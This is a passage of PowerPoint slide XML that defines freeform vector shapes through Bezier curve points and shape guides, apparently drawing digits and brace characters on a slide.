                  <a:gd name="T5" fmla="*/ 176 h 202"/>
                  <a:gd name="T6" fmla="*/ 90 w 128"/>
                  <a:gd name="T7" fmla="*/ 196 h 202"/>
                  <a:gd name="T8" fmla="*/ 62 w 128"/>
                  <a:gd name="T9" fmla="*/ 202 h 202"/>
                  <a:gd name="T10" fmla="*/ 36 w 128"/>
                  <a:gd name="T11" fmla="*/ 196 h 202"/>
                  <a:gd name="T12" fmla="*/ 16 w 128"/>
                  <a:gd name="T13" fmla="*/ 177 h 202"/>
                  <a:gd name="T14" fmla="*/ 4 w 128"/>
                  <a:gd name="T15" fmla="*/ 146 h 202"/>
                  <a:gd name="T16" fmla="*/ 0 w 128"/>
                  <a:gd name="T17" fmla="*/ 105 h 202"/>
                  <a:gd name="T18" fmla="*/ 4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6" y="131"/>
                      <a:pt x="123" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="116" y="167"/>
                      <a:pt x="111" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="184"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="200"/>
                      <a:pt x="73" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="185"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="158"/>
                      <a:pt x="4" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="12" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107"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Freeform 323"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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Freeform 324"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="1468"/>
                <a:ext cx="83" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31"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325"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 326"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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5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5"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Freeform 327"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6362"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5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Freeform 328"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6557" y="1469"/>
                <a:ext cx="156" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 100 h 202"/>
                  <a:gd name="T2" fmla="*/ 124 w 128"/>
                  <a:gd name="T3" fmla="*/ 144 h 202"/>
                  <a:gd name="T4" fmla="*/ 111 w 128"/>
                  <a:gd name="T5" fmla="*/ 176 h 202"/>
                  <a:gd name="T6" fmla="*/ 90 w 128"/>
                  <a:gd name="T7" fmla="*/ 196 h 202"/>
                  <a:gd name="T8" fmla="*/ 62 w 128"/>
                  <a:gd name="T9" fmla="*/ 202 h 202"/>
                  <a:gd name="T10" fmla="*/ 36 w 128"/>
                  <a:gd name="T11" fmla="*/ 196 h 202"/>
                  <a:gd name="T12" fmla="*/ 17 w 128"/>
                  <a:gd name="T13" fmla="*/ 177 h 202"/>
                  <a:gd name="T14" fmla="*/ 4 w 128"/>
                  <a:gd name="T15" fmla="*/ 146 h 202"/>
                  <a:gd name="T16" fmla="*/ 0 w 128"/>
                  <a:gd name="T17" fmla="*/ 105 h 202"/>
                  <a:gd name="T18" fmla="*/ 5 w 128"/>
                  <a:gd name="T19" fmla="*/ 59 h 202"/>
                  <a:gd name="T20" fmla="*/ 17 w 128"/>
                  <a:gd name="T21" fmla="*/ 26 h 202"/>
                  <a:gd name="T22" fmla="*/ 38 w 128"/>
                  <a:gd name="T23" fmla="*/ 6 h 202"/>
                  <a:gd name="T24" fmla="*/ 66 w 128"/>
                  <a:gd name="T25" fmla="*/ 0 h 202"/>
                  <a:gd name="T26" fmla="*/ 128 w 128"/>
                  <a:gd name="T27" fmla="*/ 100 h 202"/>
                  <a:gd name="T28" fmla="*/ 105 w 128"/>
                  <a:gd name="T29" fmla="*/ 102 h 202"/>
                  <a:gd name="T30" fmla="*/ 65 w 128"/>
                  <a:gd name="T31" fmla="*/ 19 h 202"/>
                  <a:gd name="T32" fmla="*/ 23 w 128"/>
                  <a:gd name="T33" fmla="*/ 104 h 202"/>
                  <a:gd name="T34" fmla="*/ 64 w 128"/>
                  <a:gd name="T35" fmla="*/ 183 h 202"/>
                  <a:gd name="T36" fmla="*/ 105 w 128"/>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2">
                    <a:moveTo>
                      <a:pt x="128" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="116"/>
                      <a:pt x="127" y="131"/>
                      <a:pt x="124" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="156"/>
                      <a:pt x="116" y="167"/>
                      <a:pt x="111" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="184"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="200"/>
                      <a:pt x="73" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="44" y="200"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="185"/>
                      <a:pt x="17" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="158"/>
                      <a:pt x="4" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="5" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="46"/>
                      <a:pt x="12" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="0"/>
                      <a:pt x="128" y="33"/>
                      <a:pt x="128" y="100"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="46"/>
                      <a:pt x="92" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="47"/>
                      <a:pt x="23" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="157"/>
                      <a:pt x="37" y="183"/>
                      <a:pt x="64"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Freeform 329"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6754"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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="27" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="45"/>
                      <a:pt x="19" y="47"/>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Freeform 330"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897" y="1473"/>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7 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 63"/>
                  <a:gd name="T27" fmla="*/ 155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1"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="0"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="17"/>
                      <a:pt x="63" y="17"/>
                      <a:pt x="63" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="18"/>
                      <a:pt x="42" y="27"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="104"/>
                      <a:pt x="35" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="124"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="155"/>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Freeform 331"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="1473"/>
                <a:ext cx="78"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6 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 17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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="212"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="22" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="155"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="22" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="136"/>
                      <a:pt x="29" y="124"/>
                      <a:pt x="43" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="115"/>
                      <a:pt x="22" y="104"/>
                      <a:pt x="22" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="15"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="102"/>
                      <a:pt x="49" y="111"/>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Freeform 332"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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8" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28"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6"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333"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311" y="1469"/>
                <a:ext cx="155" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 100 h 202"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 144 h 202"/>
                  <a:gd name="T4" fmla="*/ 110 w 127"/>
                  <a:gd name="T5" fmla="*/ 176 h 202"/>
                  <a:gd name="T6" fmla="*/ 89 w 127"/>
                  <a:gd name="T7" fmla="*/ 196 h 202"/>
                  <a:gd name="T8" fmla="*/ 62 w 127"/>
                  <a:gd name="T9" fmla="*/ 202 h 202"/>
                  <a:gd name="T10" fmla="*/ 35 w 127"/>
                  <a:gd name="T11" fmla="*/ 196 h 202"/>
                  <a:gd name="T12" fmla="*/ 16 w 127"/>
                  <a:gd name="T13" fmla="*/ 177 h 202"/>
                  <a:gd name="T14" fmla="*/ 4 w 127"/>
                  <a:gd name="T15" fmla="*/ 146 h 202"/>
                  <a:gd name="T16" fmla="*/ 0 w 127"/>
                  <a:gd name="T17" fmla="*/ 105 h 202"/>
                  <a:gd name="T18" fmla="*/ 4 w 127"/>
                  <a:gd name="T19" fmla="*/ 59 h 202"/>
                  <a:gd name="T20" fmla="*/ 17 w 127"/>
                  <a:gd name="T21" fmla="*/ 26 h 202"/>
                  <a:gd name="T22" fmla="*/ 37 w 127"/>
                  <a:gd name="T23" fmla="*/ 6 h 202"/>
                  <a:gd name="T24" fmla="*/ 66 w 127"/>
                  <a:gd name="T25" fmla="*/ 0 h 202"/>
                  <a:gd name="T26" fmla="*/ 127 w 127"/>
                  <a:gd name="T27" fmla="*/ 100 h 202"/>
                  <a:gd name="T28" fmla="*/ 104 w 127"/>
                  <a:gd name="T29" fmla="*/ 102 h 202"/>
                  <a:gd name="T30" fmla="*/ 65 w 127"/>
                  <a:gd name="T31" fmla="*/ 19 h 202"/>
                  <a:gd name="T32" fmla="*/ 23 w 127"/>
                  <a:gd name="T33" fmla="*/ 104 h 202"/>
                  <a:gd name="T34" fmla="*/ 64 w 127"/>
                  <a:gd name="T35" fmla="*/ 183 h 202"/>
                  <a:gd name="T36" fmla="*/ 104 w 127"/>
                  <a:gd name="T37" fmla="*/ 1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2">
                    <a:moveTo>
                      <a:pt x="127" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="116"/>
                      <a:pt x="126" y="131"/>
                      <a:pt x="123" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="116" y="167"/>
                      <a:pt x="110" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="184"/>
                      <a:pt x="97" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="192"/>
                      <a:pt x="21" y="185"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="169"/>
                      <a:pt x="6" y="158"/>
                      <a:pt x="4" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="1" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="18"/>
                      <a:pt x="29" y="11"/>
                      <a:pt x="37" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="2"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="127" y="33"/>
                      <a:pt x="127" y="100"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104" y="102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="46"/>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Freeform 334"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509" y="1468"/>
                <a:ext cx="81" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 67 w 67"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 45 w 67"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 45 w 67"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 37 w 67"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="30" y="41"/>
                      <a:pt x="26" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="18" y="47"/>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Freeform 335"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657" y="1468"/>
                <a:ext cx="83" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 46 w 68"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 46 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="27" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="45"/>
                      <a:pt x="18" y="47"/>
                      <a:pt x="14" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="51"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="28"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="23"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37"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Freeform 336"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="1460"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 80 w 179"/>
                  <a:gd name="T5" fmla="*/ 199 h 209"/>
                  <a:gd name="T6" fmla="*/ 32 w 179"/>
                  <a:gd name="T7" fmla="*/ 202 h 209"/>
                  <a:gd name="T8" fmla="*/ 2 w 179"/>
                  <a:gd name="T9" fmla="*/ 184 h 209"/>
                  <a:gd name="T10" fmla="*/ 14 w 179"/>
                  <a:gd name="T11" fmla="*/ 160 h 209"/>
                  <a:gd name="T12" fmla="*/ 9 w 179"/>
                  <a:gd name="T13" fmla="*/ 163 h 209"/>
                  <a:gd name="T14" fmla="*/ 6 w 179"/>
                  <a:gd name="T15" fmla="*/ 184 h 209"/>
                  <a:gd name="T16" fmla="*/ 45 w 179"/>
                  <a:gd name="T17" fmla="*/ 203 h 209"/>
                  <a:gd name="T18" fmla="*/ 42 w 179"/>
                  <a:gd name="T19" fmla="*/ 153 h 209"/>
                  <a:gd name="T20" fmla="*/ 25 w 179"/>
                  <a:gd name="T21" fmla="*/ 134 h 209"/>
                  <a:gd name="T22" fmla="*/ 51 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 187 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160 w 179"/>
                  <a:gd name="T41" fmla="*/ 153 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 72 h 209"/>
                  <a:gd name="T44" fmla="*/ 101 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 80 h 209"/>
                  <a:gd name="T48" fmla="*/ 63 w 179"/>
                  <a:gd name="T49" fmla="*/ 77 h 209"/>
                  <a:gd name="T50" fmla="*/ 56 w 179"/>
                  <a:gd name="T51" fmla="*/ 101 h 209"/>
                  <a:gd name="T52" fmla="*/ 45 w 179"/>
                  <a:gd name="T53" fmla="*/ 141 h 209"/>
                  <a:gd name="T54" fmla="*/ 38 w 179"/>
                  <a:gd name="T55" fmla="*/ 121 h 209"/>
                  <a:gd name="T56" fmla="*/ 40 w 179"/>
                  <a:gd name="T57" fmla="*/ 143 h 209"/>
                  <a:gd name="T58" fmla="*/ 64 w 179"/>
                  <a:gd name="T59" fmla="*/ 178 h 209"/>
                  <a:gd name="T60" fmla="*/ 70 w 179"/>
                  <a:gd name="T61" fmla="*/ 198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7 w 179"/>
                  <a:gd name="T75" fmla="*/ 135 h 209"/>
                  <a:gd name="T76" fmla="*/ 116 w 179"/>
                  <a:gd name="T77" fmla="*/ 94 h 209"/>
                  <a:gd name="T78" fmla="*/ 103 w 179"/>
                  <a:gd name="T79" fmla="*/ 54 h 209"/>
                  <a:gd name="T80" fmla="*/ 97 w 179"/>
                  <a:gd name="T81" fmla="*/ 37 h 209"/>
                  <a:gd name="T82" fmla="*/ 107 w 179"/>
                  <a:gd name="T83" fmla="*/ 49 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 45 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 49 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59 h 209"/>
                  <a:gd name="T98" fmla="*/ 86 w 179"/>
                  <a:gd name="T99" fmla="*/ 68 h 209"/>
                  <a:gd name="T100" fmla="*/ 71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0" y="153"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="156"/>
                      <a:pt x="162" y="159"/>
                      <a:pt x="162" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="166"/>
                      <a:pt x="166" y="169"/>
